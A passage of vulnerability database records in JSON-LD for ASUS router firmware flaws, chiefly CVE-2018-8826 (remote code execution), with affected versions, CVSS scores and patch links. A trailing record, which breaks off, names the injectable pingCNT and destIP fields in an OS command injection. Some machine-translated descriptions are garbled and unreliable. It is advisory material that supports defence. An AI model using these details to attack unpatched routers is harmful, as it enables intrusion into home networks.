"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ASUS\u00a0WRT-AC66U\u00a03\u00a0RT\u00a0 Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-001472"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202001-1236"
}
],
"trust": 0.6
}
}
VAR-201804-1564
Vulnerability from variot - Updated: 2024-11-23 22:41ASUS RT-AC51U, RT-AC58U, RT-AC66U, RT-AC1750, RT-ACRH13, and RT-N12 D1 routers with firmware before 3.0.0.4.380.8228; RT-AC52U B1, RT-AC1200 and RT-N600 routers with firmware before 3.0.0.4.380.10446; RT-AC55U and RT-AC55UHP routers with firmware before 3.0.0.4.382.50276; RT-AC86U and RT-AC2900 routers with firmware before 3.0.0.4.384.20648; and possibly other RT-series routers allow remote attackers to execute arbitrary code via unspecified vectors. plural ASUS Router product firmware contains a vulnerability related to input validation.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ASUSRT-AC51U and others are router products of ASUS. There are security vulnerabilities in several ASUS products. A remote attacker can exploit this vulnerability to execute arbitrary code. The following products are affected: ASUS RT-AC51U, RT-AC58U, RT-AC66U, RT-AC1750, RT-ACRH13, RT-N12 D1 (using firmware earlier than 3.0.0.4.380.8228); RT-AC52U B1, RT-AC1200 , RT-N600 (use the previous version 3.0.0.4.380.10446 firmware); RT-AC55U, RT-AC55UHP (use the previous version 3.0.0.4.382.50276 firmware); RT-AC86U, RT-AC2900 (use the previous version 3.0. version 0.4.384.20648 firmware)
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201804-1564",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rt-ac1200",
"scope": "eq",
"trust": 1.6,
"vendor": "asus",
"version": "3.0.0.4.380.10446"
},
{
"model": "rt-ac55u",
"scope": "eq",
"trust": 1.6,
"vendor": "asus",
"version": "3.0.0.4.382.50276"
},
{
"model": "rt-ac1750",
"scope": "eq",
"trust": 1.6,
"vendor": "asus",
"version": "3.0.0.4.380.8228"
},
{
"model": "rt-n12 d1",
"scope": "eq",
"trust": 1.6,
"vendor": "asus",
"version": "3.0.0.4.380.8228"
},
{
"model": "rt-n600",
"scope": "eq",
"trust": 1.6,
"vendor": "asus",
"version": "3.0.0.4.380.10446"
},
{
"model": "rt-ac86u",
"scope": "eq",
"trust": 1.6,
"vendor": "asus",
"version": "3.0.0.4.384.20648"
},
{
"model": "rt-ac2900",
"scope": "eq",
"trust": 1.6,
"vendor": "asus",
"version": "3.0.0.4.384.20648"
},
{
"model": "rt-ac52u b1",
"scope": "eq",
"trust": 1.6,
"vendor": "asus",
"version": "3.0.0.4.380.10446"
},
{
"model": "rt-ac55uhp",
"scope": "eq",
"trust": 1.6,
"vendor": "asus",
"version": "3.0.0.4.382.50276"
},
{
"model": "rt-acrh13",
"scope": "eq",
"trust": 1.6,
"vendor": "asus",
"version": "3.0.0.4.380.8228"
},
{
"model": "rt-ac66u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.380.8228"
},
{
"model": "rt-ac51u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.380.8228"
},
{
"model": "rt-ac58u",
"scope": "eq",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.380.8228"
},
{
"model": "rt-ac1200",
"scope": "lt",
"trust": 0.8,
"vendor": "asustek computer",
"version": "3.0.0.4.380.10446"
},
{
"model": "rt-ac1750",
"scope": "lt",
"trust": 0.8,
"vendor": "asustek computer",
"version": "3.0.0.4.380.8228"
},
{
"model": "rt-ac2900",
"scope": "lt",
"trust": 0.8,
"vendor": "asustek computer",
"version": "3.0.0.4.384.20648"
},
{
"model": "rt-ac51u",
"scope": "lt",
"trust": 0.8,
"vendor": "asustek computer",
"version": "3.0.0.4.380.8228"
},
{
"model": "rt-ac52u b1",
"scope": "lt",
"trust": 0.8,
"vendor": "asustek computer",
"version": "3.0.0.4.380.10446"
},
{
"model": "rt-ac55u",
"scope": "lt",
"trust": 0.8,
"vendor": "asustek computer",
"version": "3.0.0.4.382.50276"
},
{
"model": "rt-ac55uhp",
"scope": "lt",
"trust": 0.8,
"vendor": "asustek computer",
"version": "3.0.0.4.382.50276"
},
{
"model": "rt-ac58u",
"scope": "lt",
"trust": 0.8,
"vendor": "asustek computer",
"version": "3.0.0.4.380.8228"
},
{
"model": "rt-ac66u",
"scope": "lt",
"trust": 0.8,
"vendor": "asustek computer",
"version": "3.0.0.4.380.8228"
},
{
"model": "rt-ac86u",
"scope": "lt",
"trust": 0.8,
"vendor": "asustek computer",
"version": "3.0.0.4.384.20648"
},
{
"model": "rt-acrh13",
"scope": "lt",
"trust": 0.8,
"vendor": "asustek computer",
"version": "3.0.0.4.380.8228"
},
{
"model": "rt-n12 d1",
"scope": "lt",
"trust": 0.8,
"vendor": "asustek computer",
"version": "3.0.0.4.380.8228"
},
{
"model": "rt-n600",
"scope": "lt",
"trust": 0.8,
"vendor": "asustek computer",
"version": "3.0.0.4.380.10446"
},
{
"model": "rt-ac1750",
"scope": "lt",
"trust": 0.6,
"vendor": "asus",
"version": "3.0.0.4.380.8228"
},
{
"model": "rt-n12 d1",
"scope": "lt",
"trust": 0.6,
"vendor": "asus",
"version": "3.0.0.4.380.8228"
},
{
"model": "rt-acrh13",
"scope": "lt",
"trust": 0.6,
"vendor": "asus",
"version": "3.0.0.4.380.8228"
},
{
"model": "rt-ac66u",
"scope": "lt",
"trust": 0.6,
"vendor": "asus",
"version": "3.0.0.4.380.8228"
},
{
"model": "rt-ac58u",
"scope": "lt",
"trust": 0.6,
"vendor": "asus",
"version": "3.0.0.4.380.8228"
},
{
"model": "rt-ac51u",
"scope": "lt",
"trust": 0.6,
"vendor": "asus",
"version": "3.0.0.4.380.8228"
},
{
"model": "rt-ac52u b1",
"scope": "lt",
"trust": 0.6,
"vendor": "asus",
"version": "3.0.0.4.380.10446"
},
{
"model": "rt-ac1200",
"scope": "lt",
"trust": 0.6,
"vendor": "asus",
"version": "3.0.0.4.380.10446"
},
{
"model": "rt-n600",
"scope": "lt",
"trust": 0.6,
"vendor": "asus",
"version": "3.0.0.4.380.10446"
},
{
"model": "rt-ac55u",
"scope": "lt",
"trust": 0.6,
"vendor": "asus",
"version": "3.0.0.4.382.50276"
},
{
"model": "rt-ac55uhp",
"scope": "lt",
"trust": 0.6,
"vendor": "asus",
"version": "3.0.0.4.382.50276"
},
{
"model": "rt-ac2900",
"scope": "lt",
"trust": 0.6,
"vendor": "asus",
"version": "3.0.0.4.384.20648"
},
{
"model": "rt-ac86u",
"scope": "lt",
"trust": 0.6,
"vendor": "asus",
"version": "3.0.0.4.384.20648"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09806"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004414"
},
{
"db": "CNNVD",
"id": "CNNVD-201804-1316"
},
{
"db": "NVD",
"id": "CVE-2018-8826"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:asus:rt-ac1200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-ac1750_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-ac2900_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-ac51u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-ac52u_b1_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-ac55u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-ac55uhp_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-ac58u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-ac66u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-ac86u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-acrh13_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-n12_d1_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-n600_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-004414"
}
]
},
"cve": "CVE-2018-8826",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2018-8826",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-09806",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-138858",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2018-8826",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-8826",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2018-8826",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2018-09806",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201804-1316",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-138858",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09806"
},
{
"db": "VULHUB",
"id": "VHN-138858"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004414"
},
{
"db": "CNNVD",
"id": "CNNVD-201804-1316"
},
{
"db": "NVD",
"id": "CVE-2018-8826"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ASUS RT-AC51U, RT-AC58U, RT-AC66U, RT-AC1750, RT-ACRH13, and RT-N12 D1 routers with firmware before 3.0.0.4.380.8228; RT-AC52U B1, RT-AC1200 and RT-N600 routers with firmware before 3.0.0.4.380.10446; RT-AC55U and RT-AC55UHP routers with firmware before 3.0.0.4.382.50276; RT-AC86U and RT-AC2900 routers with firmware before 3.0.0.4.384.20648; and possibly other RT-series routers allow remote attackers to execute arbitrary code via unspecified vectors. plural ASUS Router product firmware contains a vulnerability related to input validation.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ASUSRT-AC51U and others are router products of ASUS. There are security vulnerabilities in several ASUS products. A remote attacker can exploit this vulnerability to execute arbitrary code. The following products are affected: ASUS RT-AC51U, RT-AC58U, RT-AC66U, RT-AC1750, RT-ACRH13, RT-N12 D1 (using firmware earlier than 3.0.0.4.380.8228); RT-AC52U B1, RT-AC1200 , RT-N600 (use the previous version 3.0.0.4.380.10446 firmware); RT-AC55U, RT-AC55UHP (use the previous version 3.0.0.4.382.50276 firmware); RT-AC86U, RT-AC2900 (use the previous version 3.0. version 0.4.384.20648 firmware)",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-8826"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004414"
},
{
"db": "CNVD",
"id": "CNVD-2018-09806"
},
{
"db": "VULHUB",
"id": "VHN-138858"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-8826",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004414",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201804-1316",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-09806",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-138858",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09806"
},
{
"db": "VULHUB",
"id": "VHN-138858"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004414"
},
{
"db": "CNNVD",
"id": "CNNVD-201804-1316"
},
{
"db": "NVD",
"id": "CVE-2018-8826"
}
]
},
"id": "VAR-201804-1564",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09806"
},
{
"db": "VULHUB",
"id": "VHN-138858"
}
],
"trust": 1.3063388469230768
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09806"
}
]
},
"last_update_date": "2024-11-23T22:41:51.846000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "RT-AC55U",
"trust": 0.8,
"url": "https://www.asus.com/us/supportonly/RT-AC55U/HelpDesk_BIOS/"
},
{
"title": "RT-AC1200",
"trust": 0.8,
"url": "https://www.asus.com/us/Networking/RT-AC1200/HelpDesk_BIOS/"
},
{
"title": "RT-AC55UHP",
"trust": 0.8,
"url": "https://www.asus.com/us/supportonly/RT-AC55UHP/HelpDesk_BIOS/"
},
{
"title": "RT-AC1750",
"trust": 0.8,
"url": "https://www.asus.com/us/Networking/RT-AC1750/HelpDesk_BIOS/"
},
{
"title": "RT-AC66U",
"trust": 0.8,
"url": "https://www.asus.com/us/Networking/RTAC66U/HelpDesk_BIOS/"
},
{
"title": "RT-AC86U",
"trust": 0.8,
"url": "https://www.asus.com/us/Networking/RT-AC86U/HelpDesk_BIOS/"
},
{
"title": "RT-ACRH13",
"trust": 0.8,
"url": "https://www.asus.com/us/Networking/RT-ACRH13/HelpDesk_BIOS/"
},
{
"title": "RT-N600",
"trust": 0.8,
"url": "https://www.asus.com/ca-en/Networking/RT-N600/HelpDesk_Download/"
},
{
"title": "RT-N12_D1",
"trust": 0.8,
"url": "https://www.asus.com/us/Networking/RTN12_D1/HelpDesk_BIOS/"
},
{
"title": "RT-AC2900",
"trust": 0.8,
"url": "https://www.asus.com/Networking/RT-AC2900/HelpDesk_BIOS/"
},
{
"title": "RT-N66W",
"trust": 0.8,
"url": "https://www.asus.com/us/Networking/RTN66W/HelpDesk_BIOS/"
},
{
"title": "RT-AC52U-B1",
"trust": 0.8,
"url": "https://www.asus.com/Networking/RT-AC52U-B1/HelpDesk_BIOS/"
},
{
"title": "RT-AC51U",
"trust": 0.8,
"url": "https://www.asus.com/us/supportonly/RT-AC51U/HelpDesk_BIOS/"
},
{
"title": "RT-AC58U",
"trust": 0.8,
"url": "https://www.asus.com/sg/Networking/RT-AC58U/HelpDesk_BIOS/"
},
{
"title": "Patches for arbitrary code execution vulnerabilities for multiple ASUS products",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/129599"
},
{
"title": "Multiple ASUS Product security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=79610"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09806"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004414"
},
{
"db": "CNNVD",
"id": "CNNVD-201804-1316"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-138858"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004414"
},
{
"db": "NVD",
"id": "CVE-2018-8826"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://www.asus.com/networking/rt-ac2900/helpdesk_bios/"
},
{
"trust": 1.7,
"url": "https://www.asus.com/networking/rt-ac52u-b1/helpdesk_bios/"
},
{
"trust": 1.7,
"url": "https://www.asus.com/ca-en/networking/rt-n600/helpdesk_download/"
},
{
"trust": 1.7,
"url": "https://www.asus.com/sg/networking/rt-ac58u/helpdesk_bios/"
},
{
"trust": 1.7,
"url": "https://www.asus.com/us/networking/rt-ac1200/helpdesk_bios/"
},
{
"trust": 1.7,
"url": "https://www.asus.com/us/networking/rt-ac1750/helpdesk_bios/"
},
{
"trust": 1.7,
"url": "https://www.asus.com/us/networking/rt-ac86u/helpdesk_bios/"
},
{
"trust": 1.7,
"url": "https://www.asus.com/us/networking/rt-acrh13/helpdesk_bios/"
},
{
"trust": 1.7,
"url": "https://www.asus.com/us/networking/rtac66u/helpdesk_bios/"
},
{
"trust": 1.7,
"url": "https://www.asus.com/us/networking/rtn12_d1/helpdesk_bios/"
},
{
"trust": 1.7,
"url": "https://www.asus.com/us/networking/rtn66w/helpdesk_bios/"
},
{
"trust": 1.7,
"url": "https://www.asus.com/us/supportonly/rt-ac51u/helpdesk_bios/"
},
{
"trust": 1.7,
"url": "https://www.asus.com/us/supportonly/rt-ac55u/helpdesk_bios/"
},
{
"trust": 1.7,
"url": "https://www.asus.com/us/supportonly/rt-ac55uhp/helpdesk_bios/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-8826"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-8826"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-09806"
},
{
"db": "VULHUB",
"id": "VHN-138858"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004414"
},
{
"db": "CNNVD",
"id": "CNNVD-201804-1316"
},
{
"db": "NVD",
"id": "CVE-2018-8826"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-09806"
},
{
"db": "VULHUB",
"id": "VHN-138858"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004414"
},
{
"db": "CNNVD",
"id": "CNNVD-201804-1316"
},
{
"db": "NVD",
"id": "CVE-2018-8826"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-05-18T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-09806"
},
{
"date": "2018-04-20T00:00:00",
"db": "VULHUB",
"id": "VHN-138858"
},
{
"date": "2018-06-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-004414"
},
{
"date": "2018-04-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201804-1316"
},
{
"date": "2018-04-20T20:29:00.583000",
"db": "NVD",
"id": "CVE-2018-8826"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-05-18T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-09806"
},
{
"date": "2018-05-24T00:00:00",
"db": "VULHUB",
"id": "VHN-138858"
},
{
"date": "2018-06-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-004414"
},
{
"date": "2018-04-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201804-1316"
},
{
"date": "2024-11-21T04:14:23.937000",
"db": "NVD",
"id": "CVE-2018-8826"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201804-1316"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural ASUS Vulnerability related to input validation in router product firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-004414"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201804-1316"
}
],
"trust": 0.6
}
}
VAR-201804-1341
Vulnerability from variot - Updated: 2024-11-23 22:06Main_Analysis_Content.asp in /apply.cgi on ASUS RT-AC66U, RT-AC68U, RT-AC86U, RT-AC88U, RT-AC1900, RT-AC2900, and RT-AC3100 devices before 3.0.0.4.384_10007; RT-N18U devices before 3.0.0.4.382.39935; RT-AC87U and RT-AC3200 devices before 3.0.0.4.382.50010; and RT-AC5300 devices before 3.0.0.4.384.20287 allows OS command injection via the pingCNT and destIP fields of the SystemCmd variable. plural ASUS The product includes OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ASUS RT-AC66U, etc. are all wireless router products of ASUS. Attackers can use the percent and desktOP fields of the System Cmd variable to inject this vulnerability and execute operating system commands with higher authority. The following products and versions are affected: ASUS RT-AC66U; RT-AC68U; RT-AC86U; RT-AC88U; RT-AC1900; .382.39935 prior; RT-AC87U and RT-AC3200 prior to 3.0.0.4.382.50010; RT-AC5300 prior to 3.0.0.4.384.20287
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201804-1341",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rt-n18u",
"scope": "lt",
"trust": 1.6,
"vendor": "asus",
"version": "3.0.0.4.382.39935"
},
{
"model": "rt-ac87u",
"scope": "lt",
"trust": 1.6,
"vendor": "asus",
"version": "3.0.0.4.382.50010"
},
{
"model": "rt-ac3200",
"scope": "lt",
"trust": 1.6,
"vendor": "asus",
"version": "3.0.0.4.382.50010"
},
{
"model": "rt-ac5300",
"scope": "lt",
"trust": 1.6,
"vendor": "asus",
"version": "3.0.0.4.384.20287"
},
{
"model": "rt-ac86u",
"scope": "lt",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.384.10007"
},
{
"model": "rt-ac68u",
"scope": "lt",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.384.10007"
},
{
"model": "rt-ac2900",
"scope": "lt",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.384.10007"
},
{
"model": "rt-ac3100",
"scope": "lt",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.384.10007"
},
{
"model": "rt-ac88u",
"scope": "lt",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.384.10007"
},
{
"model": "rt-ac1900",
"scope": "lt",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.384.10007"
},
{
"model": "rt-ac66u",
"scope": "lt",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.384.10007"
},
{
"model": "rt-ac1900",
"scope": null,
"trust": 0.8,
